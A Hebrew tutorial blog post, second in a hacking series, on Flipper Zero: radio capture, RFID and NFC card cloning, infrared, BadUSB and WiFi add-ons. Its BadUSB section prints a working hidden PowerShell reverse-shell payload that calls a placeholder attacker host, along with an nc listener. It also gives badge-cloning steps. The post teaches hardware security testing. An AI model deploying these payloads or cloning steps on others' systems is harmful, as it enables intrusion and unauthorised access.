תפריט
אודות שירותים מסע עבדו איתי
Circuit board close-up
אבטחה מרץ 6, 2026 • 22 דקות קריאה

Flipper Zero Mastery: Every Protocol, Every Trick

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

שתפו:
Lee Foropoulos

Lee Foropoulos

22 דקות קריאה

The Hacker's Path: סדרה בת 5 חלקים

חלק 1: מבואחלק 2: שליטה ב-Flipperחלק 3: יסודות Kaliחלק 4: ניצולחלק 5: הביקורת המלאה

בחלק 1, עשיתם את הצעדים הראשונים. שכפלתם שלטי IR, סרקתם כרטיסי NFC, צפיתם בספקטרום ה-sub-GHz מאיר ותקלדתם "Hello World" עם BadUSB. ראיתם שאבטחה היא לעתים קרובות אשליה.

עכשיו נכנסים לעומק. בסוף המאמר הזה, תבינו כל פרוטוקול עיקרי שה-Flipper Zero שלכם יכול לתקשר איתו, לא רק איך להשתמש בהם, אלא למה הם עובדים ככה ומה זה אומר לאבטחה.

אזהרה הוגנת: אתם עומדים לגלות שכמה דברים שהנחתם שהם מאובטחים... לא מאובטחים.

הפילוסופיה של Flipper

לפני שנצלול לפרוטוקולים, בואו נקבע את הגישה הנכונה. ה-Flipper Zero הוא לא "מכשיר פריצה" במובן ההוליוודי. הוא כלי למידה שמאפשר לכם לתקשר עם תדרי רדיו ופרוטוקולי חומרה שבדרך כלל בלתי נראים.

חשבו עליו כזכוכית מגדלת לאותות אלחוטיים. האותות תמיד היו שם. פשוט לא יכולתם לראות אותם. עכשיו אתם יכולים.

רוב ה"אבטחה" מסתמכת על ערפול, על ההנחה שתוקפים לא ידעו איך לתקשר עם מערכת. ה-Flipper שלכם מסיר את הערפול הזה.

⚠️ תזכורת: רק הדברים שלכם

הכל במאמר הזה מיועד לבדיקת המכשירים, הכרטיסים והמערכות שלכם בלבד. הטכניקות עובדות על הדברים של כל אחד, זה הנקודה. אבל שימוש בהם על מערכות שאינן שלכם הוא בלתי חוקי.

Sub-GHz: הספקטרום הבלתי נראה

תדרי רדיו תת-גיגהרץ נמצאים בכל מקום. דלת המוסך, שלט הרכב, תחנת מזג האוויר, הפעמון האלחוטי, חיישני לחץ צמיגים, מכשירי בית חכם, כולם משדרים כל הזמן בתדרים מתחת ל-1 GHz.

נוף התדרים

  • 315 MHz: צפון אמריקה: דלתות מוסך ישנות, שלטי רכב
  • 390 MHz: צפון אמריקה: דלתות מוסך, כלי רכב מסוימים
  • 433.92 MHz: עולמי: תחנות מזג אוויר, חיישנים, מכשירים אירופיים, מוצרי IoT רבים
  • 868 MHz: אירופה: בית חכם, LoRa, מוני שירותים
  • 915 MHz: אמריקה: LoRa, בית חכם, תעשייתי

פרויקט: נתחו את דלת המוסך שלכם

זמן: 15 דקות

מה תלמדו: ההבדל בין קודים סטטיים לקודים מתגלגלים, ולמה זה חשוב

שלבים:

  1. נווטו ל-Sub-GHz → Read
  2. עמדו ליד המוסך
  3. לחצו על כפתור השלט של המוסך
  4. צפו ב-Flipper לוכד את האות
  5. בדקו מה נלכד

מה אתם עשויים לראות:

  • Princeton, Linear, Chamberlain (ישן): קודים סטטיים. אותו קוד כל פעם. פגיע להתקפות חזרה.
  • KeeLoq, Security+ 2.0, Rolling Code: קודים מתגלגלים. כל שידור משתמש בקוד אחר מרצף מסונכרן.

קודים מתגלגלים בהסבר

דלתות מוסך ושלטי רכב מודרניים משתמשים בקודים מתגלגלים. ככה הם עובדים:

  1. המשדר והמקלט חולקים seed סודי ואלגוריתם
  2. כל לחיצת כפתור מייצרת את הקוד הבא ברצף מסונכרן
  3. המקלט מקבל את הקוד הנוכחי או כל אחד מ-~256 הקודים הבאים
  4. קוד שנעשה בו שימוש מבוטל לנצח

פרויקט: לכדו נתוני תחנת מזג אוויר

זמן: 10 דקות

מה תמצאו: טמפרטורה, לחות, מצב סוללה, מזהה חיישן, הכל משודר בטקסט גלוי. ללא הצפנה, ללא אימות.

מושג גלי רדיו
ספקטרום הרדיו סביבכם פעיל כל הזמן עם שידורים לא מוצפנים

RFID: עולם ה-125kHz

RFID בתדר נמוך (125kHz) הוא טכנולוגיית כרטיסי קרבה ישנה ופשוטה יותר. תמצאו אותה בכרטיסי חדר כושר, כרטיסי גישה ישנים למשרדים, חניונים ומערכות כניסה לבניינים.

והיא כמעט אוניברסלית נוראית לאבטחה.

איך עובד RFID 125kHz

הכרטיסים האלה פסיביים, אין להם סוללה. כשמחזיקים אחד ליד קורא, השדה האלקטרומגנטי של הקורא מזין את הכרטיס, והכרטיס משדר את מספר הזיהוי שלו. זהו. ללא challenge-response. ללא הצפנה. רק: "אני כרטיס מספר 12345."

סוגי כרטיסים נפוצים

  • EM4100: נפוץ מאוד. משדר פשוט מזהה של 40 ביט. אפס אבטחה.
  • HID Prox: כרטיס הגישה הארגוני הנפוץ ביותר. אפס אבטחה.
  • Indala: פחות נפוץ. אותה בעיה: ללא אבטחה.
  • AWID: גרסה נוספת. אותה חולשה יסודית.

פרויקט: שכפלו את כרטיס חדר הכושר

זמן: 5 דקות

מה תצטרכו: כרטיס ה-125kHz שלכם, כרטיס ריק T5577 ($1-2 ליחידה)

שלבים:

  1. נווטו ל-125 kHz RFID → Read
  2. החזיקו את הכרטיס נגד גב ה-Flipper
  3. המתינו לקריאה מוצלחת
  4. שמרו עם שם מזוהה
  5. לבדיקת אמולציה: Saved → Select Card → Emulate

לכתיבה על T5577 ריק:

  1. לכו לכרטיס השמור
  2. בחרו Write
  3. החזיקו כרטיס T5577 ריק ליד ה-Flipper
  4. המתינו לאישור כתיבה
  5. עכשיו יש לכם שכפול פיזי

נקודה מרכזית

אבטחת RFID 125kHz היא תיאטרון טהור. מערכות אלה מניחות שלא תוכלו לקרוא, להעתיק או לכתוב מחדש נתוני כרטיסים. כל שלוש ההנחות שגויות עם ציוד צרכני שעולה פחות מ-$200.

תקריב של לוח מעגלים
כל פרוטוקול אלחוטי שה-Flipper שלכם נוגע בו חושף הנחות על אבטחה שלעתים רחוקות עומדות בבדיקה

NFC: עולם ה-13.56MHz

NFC בתדר גבוה (13.56 MHz) הוא הדור החדש יותר.

סוגי כרטיסי NFC

  • MIFARE Classic: נפוץ מאוד. הצפנה קניינית שנפרצה לפני שנים. פגיע.
  • MIFARE Ultralight: כרטיסים פשוטים עם אבטחה מינימלית.
  • NTAG: נפוץ בתגיות NFC לאוטומציה.
  • MIFARE DESFire: באמת מאובטח. הצפנת AES.
  • EMV (כרטיסי תשלום): הצפנה חזקה, מגבלות עסקאות וזיהוי הונאה.

פרויקט: נתחו את כרטיס העבודה שלכם

זמן: 10 דקות

18 שנים
מאז שהצפנת MIFARE Classic נפרצה בפומבי ב-2008, ובכל זאת רוב כרטיסי הגישה הארגוניים עדיין מסתמכים עליה.

שכפול UID לעומת שכפול מלא

הבחנה חשובה: ה-Flipper תמיד יכול לקרוא ולאמלט את ה-UID של כרטיס. מערכות מתקדמות בודקות גם UID וגם נתונים מוצפנים.

כרטיסי קסם ל-NFC

  • Gen1 (UID ניתן לשינוי): יכול לכתוב UID מותאם.
  • Gen2 (CUID): תאימות טובה יותר.
  • Gen3 (UFUID): יכול לנעול UID אחרי כתיבה.
  • Gen4 (Ultimate Magic): הגמיש ביותר.

אינפרא-אדום: שליטה מלאה

בניית ספריית השלטים המושלמת

הקושחה Momentum כוללת IRDB, מסד נתונים עצום של שלטים מוקלטים מראש.

פרויקט: בנו את ארסנל ה-IR שלכם

זמן: 20 דקות

לכידת IR גולמית

נווטו ל-Infrared → Learn New → Raw כשהלמידה הסטנדרטית לא מזהה אות.

BadUSB: האלטרנטיבה ל-Rubber Ducky

BadUSB מנצל פגם יסודי: מחשבים סומכים באופן מרומז על מקלדות. ה-Flipper שלכם יכול להקליד כ-1,000 תווים בשנייה.

יסודות DuckyScript

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

פרויקט: אוסף מידע מערכת

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

פרויקט: הגדרת Reverse Shell

ב-Kali - הפעלת listener:

nc -lvnp 4444

Payload BadUSB (יעד Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

⚠️ ה-Payloads האלה אמיתיים

השתמשו בהם רק על מחשבים שלכם.

Payloads מהנים להדגמות

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11
REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: הרחבת חומרה

מודולים חיוניים

  • WiFi Dev Board: מוסיף יכולות WiFi. חיוני מחלק 3.
  • אנטנה חיצונית CC1101: מרחיבה דרמטית את טווח ה-Sub-GHz.
  • ESP32 Marauder: הופך את ה-Flipper לפלטפורמת פריצת WiFi/Bluetooth.
  • ProtoBoard: לפרויקטים מותאמים אישית.

פרויקט: הגדרת WiFi Dev Board

שלבים:

  1. Flash קושחת Marauder ל-ESP32
  2. חברו לפיני GPIO של ה-Flipper
  3. נווטו ל-GPIO → ESP32 → Marauder
  4. עכשיו יש לכם סריקת WiFi, deauth ולכידת חבילות

תכונות Momentum מתקדמות

  • אנימציות שולחן עבודה: קוסמטיות בלבד, אבל כיפיות.
  • פרוטוקולים מורחבים: תמיכה נוספת בפרוטוקולים.
  • מרכז אפליקציות: משחקים, כלים, תוכנות עזר.
  • חבילות נכסים מותאמות: שנו את כל המראה.

מה שיטרתם

עכשיו אתם מבינים:

  • Sub-GHz: איך מתקשרים דלתות מוסך, שלטי רכב וחיישנים
  • RFID 125kHz: למה כרטיסי חדר כושר ותגים ישנים ניתנים לשכפול טריוויאלי
  • NFC 13.56MHz: ההבדל בין הצפנה שבורה (MIFARE Classic) לאבטחה אמיתית (DESFire)
  • אינפרא-אדום: איך לבנות ספריית שלטים אוניברסלית
  • BadUSB: למה אמון USB HID הוא פגיעות יסודית
  • GPIO: איך להתרחב ל-WiFi, טווח מורחב וחומרה מותאמת

ה-Flipper שלכם הוא עכשיו נשק. אבל הוא מברגה בהשוואה ל-Kali Linux, שהוא סדנה שלמה. הגיע הזמן לאתחל את סביבת הפריצה האמיתית.

The Hacker's Path

סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.

חלק 1: מבוא חלק 2: שליטה ב-Flipper ✓ חלק 3: יסודות Kali חלק 4: ניצול חלק 5: ביקורת מלאה

רשימת בדיקה לחלק 2

☐ Sub-GHz: דלת מוסך נותחה, קודים מתגלגלים לעומת סטטיים הובנו

☐ RFID 125kHz: כרטיסים נקראו, לפחות שכפול אחד נבדק

☐ NFC: כרטיס עבודה נותח, סוג כרטיס זוהה

☐ אינפרא-אדום: ספריית שלטים מלאה לבית נבנתה

☐ BadUSB: Payload מידע מערכת נבדק, reverse shell הובן

☐ GPIO: WiFi dev board מוכן לחלק 3

☐ כרטיסי קסם: T5577 ו/או כרטיסי NFC קסם נרכשו לבדיקות

תוכנית פעולה לשליטה ב-Flipper 0/6

מה הלאה

בחלק 3, עוזבים את היכולות הממוקדות של ה-Flipper ונכנסים לסביבת בדיקות חדירה מלאה: Kali Linux.

תלמדו:

  • הקמת מעבדת פריצה (התקנה והגדרת VM)
  • סיור רשת עם nmap
  • סיור אלחוטי: לכידת handshakes WiFi עם aircrack-ng
  • סיור ווב: גילוי מה הנתב שלכם חושף
  • חיבור לכידות Flipper לזרימות עבודה של Kali

נתראה בחלק 3.

How was this article?

שתפו

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Al tachmits af post

Qabel hodaot keshemashmim maamarim chadashim. Lo dorshim email.

Tire banner baatar keshemashmim maamar chadash, vetodaa medafdefan im teashru.

Hodaot defdefan bilvad. Beli spam, beli email.